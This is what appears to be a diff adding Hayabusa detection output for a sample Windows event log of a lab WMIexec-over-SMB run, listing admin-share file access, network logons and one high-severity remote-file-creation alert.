+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\napsnap\285c011d18a31026f939f0b45ce83c81  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c968d57#\15c0f15336d9b4baa3bf042b39325008  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1c9175f8#\63dfa31687b025a3294657e7d8861b87  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.209 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio1da2af67#\65893eb6f605719418cb19fada199945  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio4b37ff64#\7258b8e8dc26562f4f79202ba192af07  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio5ae0f00f#\37aa83ffa60682e364b3caea876452c9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Documents  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\SMB exec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
